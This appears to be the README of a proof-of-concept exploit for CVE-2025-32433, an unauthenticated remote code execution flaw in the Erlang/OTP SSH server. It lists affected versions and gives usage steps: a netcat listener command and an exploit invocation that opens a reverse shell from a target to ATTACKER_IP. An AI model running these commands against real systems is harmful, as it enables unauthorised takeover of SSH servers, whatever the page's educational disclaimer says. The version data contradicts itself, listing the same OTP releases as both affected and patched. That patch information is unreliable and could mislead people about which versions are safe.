CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE
PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.
CVE-2025-32433 - Erlang/OTP SSH RCE PoC
Overview
PoC showing unauthenticated remote code execution in Erlang/OTP SSH server.
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.
- CVE: CVE-2025-32433
- CVSS Score: 10.0 (Critical)
- Affected Versions:
- OTP-27.3.3 and earlier
- OTP-26.2.5.11 and earlier
- OTP-25.3.2.20 and earlier
This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
References
Usage
Github Repo link
https://github.com/dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE
Listener Setup:
1
nc -lvnp 1234
1
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost
: Target IP--rport
: Target SSH port--lhost
: Your IP for reverse shell--lport
: Your listener port
Disclaimer
This repository is for educational purposes only. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.